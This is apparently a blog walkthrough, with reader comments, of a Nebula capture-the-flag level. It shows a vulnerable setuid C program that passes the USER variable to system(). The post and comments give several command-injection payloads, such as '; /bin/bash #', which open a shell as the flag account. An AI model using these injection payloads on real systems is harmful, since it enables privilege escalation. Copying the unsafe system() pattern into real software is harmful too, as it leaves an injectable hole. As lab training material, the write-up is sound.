#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
char *buffer;
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
}
What I did initially notice here, is that the "USER" variable is being called directly from the environment. This makes it very similar to the previous challenge. I luckily got this one on my first try.
level02@nebula:/home/flag02$ USER='-e "#!/bin/bash\n/bin/bash" > /tmp/level02; chmod +x /tmp/level02; /tmp/level02'
level02@nebula:/home/flag02$ export USER
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo -e "#!/bin/bash\n/bin/bash" > /tmp/level02; chmod +x /tmp/level02; /tmp/level02 is cool")
flag02@nebula:/home/flag02$ getflag
You have successfully executed getflag on a target account
What we're doing here, is injecting code into the echo command. This, like the last challenge, makes a bash script at /tmp/level02 which will ignore any other parameters. It then marks it executable so we can actually execute it. Then it executes the bash script.
Often times in situations like this, the bash script wouldn't be needed, but since the " is cool" is following the execution, it needs to handle that. A bash script lets it get ignored, where passing it as a parameter to /bin/bash would try to execute it.
I'm guessing there may be an easier way than creating the bash script. Maybe a way to comment out the rest of the line? I'm not sure, but I know this method worked great for me.
Hello, good sir!
ReplyDeleteI beat the level as such:
USER=';getflag'
Then
./flag02
Which worked as expected
That works quite well too. I have always just been trying to get a full bash shell in my samples, as a personal goal. I've seen a few other people doing it similar to you, getting it to call the getflag directly. Both work. It's neat to see how people did them differently.
ReplyDeleteHi there,
ReplyDeleteI've solved this level with:
USER="; /bin/bash #"
which gave me:
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ; /bin/bash # is cool")
flag02@nebula:/home/flag02$ getflag
You have successfully executed getflag on a target account
Cheers!
Similar to you, I just ran:
Deleteexport USER="Opening escalated shell...;bin/bash;echo Closing pwned shell, now that"
This gave me a full shell and some "cool" text when going in and after typing "exit" after running getflag
I'm not sure why we were both using "export" for this level and the last, it seems like this is not necessary as we only need the variable in this environment. Is there any reason that you thought it was necessary to use?
ReplyDeleteThat's just how I've "always done it". It may very well not be neccessary.
Delete